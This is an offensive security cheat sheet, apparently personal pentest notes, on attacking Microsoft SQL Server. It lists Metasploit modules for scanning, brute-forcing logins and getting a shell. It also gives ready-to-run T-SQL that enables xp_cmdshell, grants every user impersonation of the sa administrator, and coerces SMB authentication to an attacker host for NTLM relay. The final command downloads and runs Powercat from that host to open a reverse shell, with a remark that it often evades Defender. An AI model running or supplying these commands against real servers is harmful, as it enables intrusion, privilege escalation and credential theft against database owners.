Metasploit MS SQL modules Metasploit provides a lot of tools for enumerating and exploiting MS SQL .
auxiliary/scanner/mssql/mssql_ping
— Discover MS SQL servers (alternatively, use --script=ms-sql-info
with Nmap )
auxiliary/scanner/mssql/mssql_login
— Brute force logins
auxiliary/admin/mssql/mssql_enum
— Enumerate databases
exploit/windows/mssql/mssql_payload
— Get a shell
Link to original
xp_cmdshell
MS SQL includes the xp_cmdshell
“extended” procedure, which allows a shell command to be called. This is disabled by default, but if enabled it can be used in a trigger to provide persistence on database activity. Powercat , a re-implementation of netcat in pure PowerShell, is useful here.
-- Enable MS SQL "advanced options"
--
sp_configure ' Show Advanced Options ' , 1 ;
RECONFIGURE ;
-- Enable xp_cmdshell stored procedure
--
sp_configure ' xp_cmdshell ' , 1 ;
RECONFIGURE ;
--- OPTIONAL: Allow all users to impersonate the "sa" (database
--- administrator) user (this enables low-privilege website users
--- to run xp_cmdshell)
---
USE master ;
GRANT impersonate ON login ::sa TO [public];
-- Coerce MS SQL to connecting using SMB to an attacker at
-- 1.2.3.4. Useful for NTLM relay attacks (if SMB signing isn't
-- turned on, that is).
--
EXEC master.sys.xp_dirtree ' \\1.2.3.4\share ' , 1 , 1 ;
-- Download an execute Powercat from an attacker at 1.2.3.4
-- (using the built-in Python web server) and connect back to
-- that IP on port 1337. Note that this in general should be
-- caught by IDS/IDP systems, including Defender... But I've
-- actually had it work for me out-of-the-box a surprising
-- number of times.
--
EXEC master.sys.xp_cmdshell ' powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString( '' http://1.2.3.4:8000/powercat.ps1 '' ); powercat -c 1.2.3.4 -p 1337 -e cmd.exe" '